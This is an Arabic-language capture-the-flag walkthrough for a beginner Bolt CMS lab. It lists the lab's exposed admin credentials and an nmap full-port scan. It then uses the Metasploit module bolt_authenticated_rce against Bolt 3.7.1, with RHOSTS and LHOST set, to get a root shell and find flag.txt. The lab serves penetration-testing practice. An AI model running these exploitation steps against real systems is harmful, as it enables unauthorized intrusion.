عن اللاب
الـ Credentials المخبية في الموقع
Username
bolt
Password
boltadmin123
Login URL
:8000/bolt
CMS Version
3.7.1
Bolt لاب مبتدئ مبني على Bolt CMS. المدير ترك credentials في مقالات الموقع علناً، ثم نستغل ثغرة Authenticated RCE بـ Metasploit للوصول لـ root shell وإيجاد flag.txt.
الـ CMS بيشتغل على port 8000 مش 80 — كن منتبه عند فحص Nmap.
مسار الحل
1
Nmap — اكتشاف port 8000
فحص البورتات — port 80 (Apache افتراضي) وport 8000 (Bolt CMS) وport 22 (SSH)
nmap -sV -p- IP
2
اقرأ المقالات — اكتشف الـ Credentials
تصفح IP:8000 — مقالة فيها اسم المستخدم والتانية فيها كلمة المرور مكتوبين علناً
3
Login — Admin Panel على /bolt
روح لـ IP:8000/bolt وسجّل دخول — شوف الإصدار في الـ footer (3.7.1)
4
Metasploit — bolt_authenticated_rce
اضبط USERNAME وPASSWORD وRHOSTS وLHOST، ثم شغّل
EDB-ID: 48296
5
Find flag.txt
بعد الحصول على الـ shell، ابحث عن الـ flag في نظام الملفات
find / -name flag.txt 2>/dev/null
مرجع الأوامر
| الأمر | الوصف |
|---|---|
| nmap -sV -p- <IP> | اكتشاف port 8000 |
| http://<IP>:8000 | موقع Bolt CMS — اقرأ كل المقالات |
| http://<IP>:8000/bolt | صفحة تسجيل دخول الأدمن |
| use exploit/unix/webapp/bolt_authenticated_rce | اختيار الـ exploit |
| set USERNAME bolt / set PASSWORD boltadmin123 | الـ credentials المكتشفة |
| set RHOSTS <IP> / set LHOST <YOUR-IP> / run | تشغيل الـ exploit |
المهارات اللي هتكتسبها
CMS Enumeration
OSINT (محتوى الموقع)
Authenticated RCE
Metasploit Exploit
Web App Testing